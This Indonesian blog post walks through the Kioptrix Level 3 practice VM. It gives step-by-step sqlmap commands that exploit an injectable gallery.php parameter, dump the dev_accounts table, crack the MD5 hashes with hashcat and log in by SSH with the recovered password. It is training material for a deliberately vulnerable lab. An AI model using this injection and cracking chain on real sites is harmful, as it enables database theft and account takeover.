Preparation:
1. SQLmap dapat di temukan di sini
2. Hashcat dapat ditemukan di sini
Briefing:
1. Mapping Local Area Network
2. Cari tau url halaman login
3. Gunakan Exploit-db untuk mencari vulnerability website tersebut
4. Lakukan serangan SQL injection dengan SQLmap
5. Crack hash MD5 dengan hashcat
6. Game Over
Walkthrough:Untuk step 1 - 3 bisa dilihat di [KIOPTRIX LV3] Gaining User Password
4. Lakukan serangan SQL injection dengan SQLmap
Setelah mengetahui kelemahan target, sekarang saatnya melakukan SQL injection. Untuk mempercepat proses SQL ijection, saya menggunakan tools SQLmap yang sudah tersedia di <<back|track 5.
Buka terminal, lalu ketik:
root@red-dragon:/pentest/exploits/exploitdb# cd /pentest/database/sqlmap/
Penggunaan SQLmap tergolong mudah, formatnya adalah
root@red-dragon:/pentest/database/sqlmap# python sqlmap.py -u [vulnerable url]
Pada tahap 3 tiga sudah mengetahui letak vulnerable url korban kita terdapat pada /gallery.php?id=null. Maka kita hanya perlu menambahkan kioptrix3.com/gallery sebelum /gallery.php?id=null. Maka perintah sqlmap adalah:
root@red-dragon:/pentest/database/sqlmap# python sqlmap.py -u kioptrix3.com/gallery/gallery.php?id=null
Pada SQL injection ini, saya akan mencoba membongkar database target. Maka perintah sqlmap adalah:
root@red-dragon:/pentest/database/sqlmap# python sqlmap.py -u kioptrix3.com/gallery/gallery.php?id=null --dbs
Ada 3 database di sini:
gallery
information_schema
mysql
Saya akan menggunakan database gallery, dan mencoba mencari tau tabel apa saja yang ada pada database gallery. Maka perintah sqlmap adalah:
root@red-dragon:/pentest/database/sqlmap# python sqlmap.py -u kioptrix3.com/gallery/gallery.php?id=null -D gallery --table
Output:
Ada 7 tables di sini:
dev_accounts
gallarific_comments
gallarific_galleries
gallarific_photos
gallarific_settings
gallarific_stats
gallarific_users
Saya akan menggunakan database gallery, dan mencoba mencari tau column apa saja yang ada pada database gallery dan tabel dev_accounts. Maka perintah sqlmap adalah:
root@red-dragon:/pentest/database/sqlmap# python sqlmap.py -u kioptrix3.com/gallery/gallery.php?id=null -D gallery -T dev_accounts --column
ada 3 columns di sini:
id
password
username
Selanjutnya, dumping bagian ini dengan perintah
root@red-dragon:/pentest/database/sqlmap# python sqlmap.py -u kioptrix3.com/gallery/gallery.php?id=null -D gallery -T dev_accounts --dump
Jika ditanyakan untuk cracking hash dengan dictionary, sebaiknya imput perintah 'n' untuk menolak. Karena dictionary attack yang terdapat pada direktory sqlmap kurang lengkap. Kita akan menggunakan hashcat untuk cracking hash md5 yang satu ini.
5. Crack hash MD5 dengan hashcat
Buka terminal lalu masukan perintah:
root@red-dragon:~# echo -i "0d3eccfb887aabd50f243b3f155c0f85\n5badcaf789d3d1d09794d8f021f40f0e" > /root/hashes
kemudian masuk ke direktori hashcat dengan perintah
root@red-dragon:~# cd /pentest/passwords/hashcat/
Crack hash MD5 dengan hashcat dengan perintah:
root@red-dragon:/pentest/passwords/hashcat# ./hashcat-cli32.bin /root/hashes /root/red-dragon-wordlist.txt
note: /root/red-dragon-wordlist.txt harus sesuai dengan direktori dictionary anda.
Output:
Uji keberhasilan hashcat dalam memecahkan hash MD5 dengan melakukan koneksi SSH pada target dengan perintah:
root@red-dragon:~# ssh loneferret@kioptrix3.com
Ketika ditanyakan password, masukan "starwars" (tanpa tanda petik -> password ini sesuai dengan hasil crack dari hashcat)
Berhasil =)
Created by:
red-dragon
Supported by:
Blue Dragon
0 comment:
Post a Comment